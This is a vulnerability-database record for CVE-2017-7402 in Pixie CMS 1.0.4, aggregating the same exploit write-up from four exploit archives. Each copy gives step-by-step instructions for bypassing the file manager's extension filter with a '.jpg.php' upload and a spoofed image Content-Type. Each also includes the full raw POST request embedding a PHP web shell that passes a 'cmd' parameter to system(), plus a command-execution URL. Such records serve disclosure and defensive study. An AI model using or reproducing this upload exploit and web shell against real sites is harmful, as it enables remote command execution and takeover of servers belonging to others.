ID CVE-2017-7402 Type cve Reporter cve@mitre.org Modified 2017-08-16T01:29:00
Description
Pixie 1.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via the POST data in an admin/index.php?s=publish&x=filemanager request for a filename with a double extension, such as a .jpg.php file with Content-Type of image/jpeg.
{"zdt": [{"lastseen": "2018-03-06T21:08:33", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-04-04T00:00:00", "title": "Pixie 1.0.4 - Arbitrary File Upload Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-04T00:00:00", "href": "https://0day.today/exploit/description/27490", "id": "1337DAY-ID-27490", "sourceData": "# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no\r\n# Date: 02-April-2017\r\n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial\r\n# Vendor Homepage: http://www.getpixie.co.uk\r\n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip\r\n# Version: 1.0.4\r\n# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402\r\n \r\nI. Background:\r\nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \r\n \r\nII. Description:\r\nin Pixie CMS have three types for account privilege for upload:\r\n- Administrator - Can access file manager but restricted extension for file upload.\r\n- Client - Can access file manager but restricted extension for file upload.\r\n- User - Cannot access file manager\r\n \r\nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this \u201cUpload failed. Please check that the folder is writeable and has the correct permissions set\u201d.\r\n \r\nIII. Exploit:\r\nIn this case, we used privilege as client and then access to \u201cfile manager\u201d (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step:\r\n \r\n1. Prepare software to intercept (I used burpsuite free edtion).\r\n2. Prepare for real image (our_shell.jpg).\r\n3. Browse your real image on file manager pixie cms and click to upload button.\r\n4. Intercept and change of filename \u201cour_shell.jpg\u201d to be \u201cour_shell.jpg.php\u201d\r\n5. Under of perimeter \u201cContent-Type: image/jpeg\u201d, please change and write your shell. in this example, I use cmd shell.\r\n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this \u201cour_shell.jpg.php was successfully uploaded\u201d.\r\n7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)\r\n \r\n\u2014\u2014\u2014\u2014\r\nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1\r\nHost: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager\r\nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949\r\nContent-Length: 901\r\n \r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\"\r\nContent-Type: image/jpeg\r\n \r\n<?php\r\nif(isset($_REQUEST['cmd'])){\r\n echo \"<pre>\";\r\n $cmd = ($_REQUEST['cmd']);\r\n system($cmd);\r\n echo \"</pre>\";\r\n die;\r\n}\r\n?>\r\n \r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"file_tags\"\r\n \r\nourshell\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"submit_upload\"\r\n \r\nUpload\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n \r\n102400\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"bb2_screener_\"\r\n \r\n1490835014 192.168.1.6\r\n-----------------------------8321182121675739546763935949--\r\n This is our screenshot from PoC: \r\n| |\r\n| Upload for valid image\r\n |\r\n \r\n \r\n| |\r\n| Change extension and insert your shell\r\n |\r\n \r\n \r\n| |\r\n| Your shell success to upload on server\r\n |\r\n \r\n \r\n| |\r\n| Example command for ipconfig\r\n |\r\n \r\n \r\n| |\r\n| Example command for net user\r\n |\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27490"}], "exploitdb": [{"lastseen": "2017-04-04T11:17:15", "description": "Pixie 1.0.4 - Arbitrary File Upload. CVE-2017-7402. Webapps exploit for PHP platform", "published": "2017-04-02T00:00:00", "type": "exploitdb", "title": "Pixie 1.0.4 - Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-02T00:00:00", "id": "EDB-ID:41784", "href": "https://www.exploit-db.com/exploits/41784/", "sourceData": "# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no\r\n# Date: 02-April-2017\r\n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial\r\n# Vendor Homepage: http://www.getpixie.co.uk\r\n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip\r\n# Version: 1.0.4\r\n# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402\r\n\r\nI. Background:\r\nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \r\n\r\nII. Description:\r\nin Pixie CMS have three types for account privilege for upload:\r\n- Administrator - Can access file manager but restricted extension for file upload.\r\n- Client - Can access file manager but restricted extension for file upload.\r\n- User - Cannot access file manager\r\n\r\nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this \u201cUpload failed. Please check that the folder is writeable and has the correct permissions set\u201d.\r\n\r\nIII. Exploit:\r\nIn this case, we used privilege as client and then access to \u201cfile manager\u201d (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step:\r\n\r\n1. Prepare software to intercept (I used burpsuite free edtion).\r\n2. Prepare for real image (our_shell.jpg).\r\n3. Browse your real image on file manager pixie cms and click to upload button.\r\n4. Intercept and change of filename \u201cour_shell.jpg\u201d to be \u201cour_shell.jpg.php\u201d\r\n5. Under of perimeter \u201cContent-Type: image/jpeg\u201d, please change and write your shell. in this example, I use cmd shell.\r\n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this \u201cour_shell.jpg.php was successfully uploaded\u201d.\r\n7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)\r\n\r\n\u2014\u2014\u2014\u2014\r\nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1\r\nHost: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager\r\nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949\r\nContent-Length: 901\r\n\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\nif(isset($_REQUEST['cmd'])){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo \"<pre>\";\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $cmd = ($_REQUEST['cmd']);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 system($cmd);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo \"</pre>\";\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 die;\r\n}\r\n?>\r\n\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"file_tags\"\r\n\r\nourshell\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"submit_upload\"\r\n\r\nUpload\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n102400\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"bb2_screener_\"\r\n\r\n1490835014 192.168.1.6\r\n-----------------------------8321182121675739546763935949--\r\n\u00a0This is our screenshot from PoC:\u00a0\r\n| |\r\n| Upload for valid image\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Change extension and insert your shell\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Your shell success to upload on server\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Example command for ipconfig\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Example command for net user\r\n |\r\n\r\n\r\n\r\n\r\nIV. Thanks to:\r\n- Alloh SWT\r\n- MyBoboboy\r\n- @rungga_reksya, @dvnrcy, @dickysofficial\r\n- Komunitas IT Auditor & IT Security Kaskus\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41784/"}], "packetstorm": [{"lastseen": "2017-04-10T01:24:11", "description": "", "published": "2017-04-02T00:00:00", "type": "packetstorm", "title": "Pixie 1.0.4 Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-02T00:00:00", "id": "PACKETSTORM:141901", "href": "https://packetstormsecurity.com/files/141901/Pixie-1.0.4-Shell-Upload.html", "sourceData": "`# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no \n# Date: 02-April-2017 \n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial \n# Vendor Homepage: http://www.getpixie.co.uk \n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip \n# Version: 1.0.4 \n# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402 \n \nI. Background: \nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \n \nII. Description: \nin Pixie CMS have three types for account privilege for upload: \n- Administrator - Can access file manager but restricted extension for file upload. \n- Client - Can access file manager but restricted extension for file upload. \n- User - Cannot access file manager \n \nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this aUpload failed. Please check that the folder is writeable and has the correct permissions seta. \n \nIII. Exploit: \nIn this case, we used privilege as client and then access to afile managera (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step: \n \n1. Prepare software to intercept (I used burpsuite free edtion). \n2. Prepare for real image (our_shell.jpg). \n3. Browse your real image on file manager pixie cms and click to upload button. \n4. Intercept and change of filename aour_shell.jpga to be aour_shell.jpg.phpa \n5. Under of perimeter aContent-Type: image/jpega, please change and write your shell. in this example, I use cmd shell. \n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this aour_shell.jpg.php was successfully uploadeda. \n7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig) \n \naaaa \nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1 \nHost: 192.168.1.1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager \nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18 \nConnection: close \nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949 \nContent-Length: 901 \n \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\" \nContent-Type: image/jpeg \n \n<?php \nif(isset($_REQUEST['cmd'])){ \necho \"<pre>\"; \n$cmd = ($_REQUEST['cmd']); \nsystem($cmd); \necho \"</pre>\"; \ndie; \n} \n?> \n \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"file_tags\" \n \nourshell \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"submit_upload\" \n \nUpload \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\" \n \n102400 \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"bb2_screener_\" \n \n1490835014 192.168.1.6 \n-----------------------------8321182121675739546763935949-- \nThis is our screenshot from PoC: \n| | \n| Upload for valid image \n| \n \n \n| | \n| Change extension and insert your shell \n| \n \n \n| | \n| Your shell success to upload on server \n| \n \n \n| | \n| Example command for ipconfig \n| \n \n \n| | \n| Example command for net user \n| \n \n \n \n \nIV. Thanks to: \n- Alloh SWT \n- MyBoboboy \n- @rungga_reksya, @dvnrcy, @dickysofficial \n- Komunitas IT Auditor & IT Security Kaskus \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141901/pixie104-shell.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPixie 1.0.4 - Arbitrary File Upload", "edition": 1, "published": "2017-04-02T00:00:00", "title": "Pixie 1.0.4 - Arbitrary File Upload", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-02T00:00:00", "id": "EXPLOITPACK:2F57E0E188D69D1E215DC34D3D091F44", "href": "", "sourceData": "# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no\n# Date: 02-April-2017\n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial\n# Vendor Homepage: http://www.getpixie.co.uk\n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip\n# Version: 1.0.4\n# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402\n\nI. Background:\nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \n\nII. Description:\nin Pixie CMS have three types for account privilege for upload:\n- Administrator - Can access file manager but restricted extension for file upload.\n- Client - Can access file manager but restricted extension for file upload.\n- User - Cannot access file manager\n\nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this \u201cUpload failed. Please check that the folder is writeable and has the correct permissions set\u201d.\n\nIII. Exploit:\nIn this case, we used privilege as client and then access to \u201cfile manager\u201d (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step:\n\n1. Prepare software to intercept (I used burpsuite free edtion).\n2. Prepare for real image (our_shell.jpg).\n3. Browse your real image on file manager pixie cms and click to upload button.\n4. Intercept and change of filename \u201cour_shell.jpg\u201d to be \u201cour_shell.jpg.php\u201d\n5. Under of perimeter \u201cContent-Type: image/jpeg\u201d, please change and write your shell. in this example, I use cmd shell.\n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this \u201cour_shell.jpg.php was successfully uploaded\u201d.\n7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)\n\n\u2014\u2014\u2014\u2014\nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager\nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18\nConnection: close\nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949\nContent-Length: 901\n\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\"\nContent-Type: image/jpeg\n\n<?php\nif(isset($_REQUEST['cmd'])){\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo \"<pre>\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $cmd = ($_REQUEST['cmd']);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 system($cmd);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo \"</pre>\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 die;\n}\n?>\n\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"file_tags\"\n\nourshell\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"submit_upload\"\n\nUpload\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n102400\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"bb2_screener_\"\n\n1490835014 192.168.1.6\n-----------------------------8321182121675739546763935949--\n\u00a0This is our screenshot from PoC:\u00a0\n| |\n| Upload for valid image\n |\n\n\u00a0\n| |\n| Change extension and insert your shell\n |\n\n\u00a0\n| |\n| Your shell success to upload on server\n |\n\n\u00a0\n| |\n| Example command for ipconfig\n |\n\n\u00a0\n| |\n| Example command for net user\n |\n\n\n\n\nIV. Thanks to:\n- Alloh SWT\n- MyBoboboy\n- @rungga_reksya, @dvnrcy, @dickysofficial\n- Komunitas IT Auditor & IT Security Kaskus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
